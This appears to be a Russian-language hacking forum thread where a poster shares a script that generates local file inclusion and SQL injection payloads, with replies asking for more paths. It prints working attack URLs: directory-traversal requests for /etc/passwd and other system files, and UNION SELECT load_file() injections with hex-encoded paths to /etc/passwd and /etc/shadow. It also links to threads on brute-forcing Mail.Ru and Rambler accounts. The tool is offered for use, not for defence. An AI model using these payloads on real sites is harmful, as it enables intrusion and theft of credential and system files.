Написал скрипт, который автоматически ищет логи, при локальном инклуде и SQL инъекции. В файл dirs.txt записываем диры, которые надо проверить. Download: - [0x57656246696C652E7275] - [0xSLIL.0xRU] Скрипт может не работать если: - Не выводится ошибка - Вы неверно ввели урл Сокеты не нужны. Подходящий хостинг - ueuo.com Примеры: 1. PHP-Inj: - Пишем url: http://site.ru/include.php?file= PHP: - Результат [quote]http://site.ru/include.php?file=../../../../../../../../../../../../etc/passwd http://site.ru/include.php?file=../../../../../../../../../../../../etc/hosts http://site.ru/include.php?file=../../../../../../../../../../../../etc/ftpusers http://site.ru/include.php?file=../../../../../../../../../../../../etc/syslog.conf http://site.ru/include.php?file=../../../../../../../../../../../../etc/services http://site.ru/include.php?file=../../../../../../../../../../../../etc/group http://site.ru/include.php?file=../../../../../../../../../../../../etc/bash.bashrc http://site.ru/include.php?file=../../../../../../../../../../../../etc/profile http://site.ru/include.php?file=../../../../../../../../../../../../etc/skel/.bashrc[/quote] 2. SQL-Inj: - Пишем url: http://site.ru/users.php?id=[sql] - Колумнов: 12 - Ставим запрос на: 7 - Результат [quote]http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f736861646f77),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f686f737473),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7365727669636573),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f67726f7570),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6e6574776f726b73),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f70726f66696c65),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f736b656c2f2e626173687263),8,9,10,11,12[/quote][/INDENT] Смотрите также - [url=http://forum.antichat.ru/thread49574.html]Mail.Ru BruteForce[/url] - [url=http://forum.antichat.ru/thread49610.html]Rambler.Ru[/url]
Обновил скрипт, теперь вместо [/COLOR] надо писать [COLOR=YellowG...Green]http://x0.6te.net/injection.php[/COLOR]
номер 1 не ленись составь нормальный список, на конфиги и так далее таких тулз дофига а словарей нету...
1, норм прога...вот Кеш неплохую идею подогнал! Светлый, о каких путях на винде ты говоришь??? $systemdir ??
Ок, не нравится, не ешь, у тебя наверно один приват. Я уже давно эту прогу смотрел, она не пашет и не атоматическая, много кнопок всяких
Обновил скрипт, обновил логи. Если кто-то хочет помочь, пишите ещё пути сюда, добавлю. P.S. Скрипт теперь ищет дольше, но больше. P.P.S. Не могу зайти на x0.6te.net, поэтому не могу обновить.
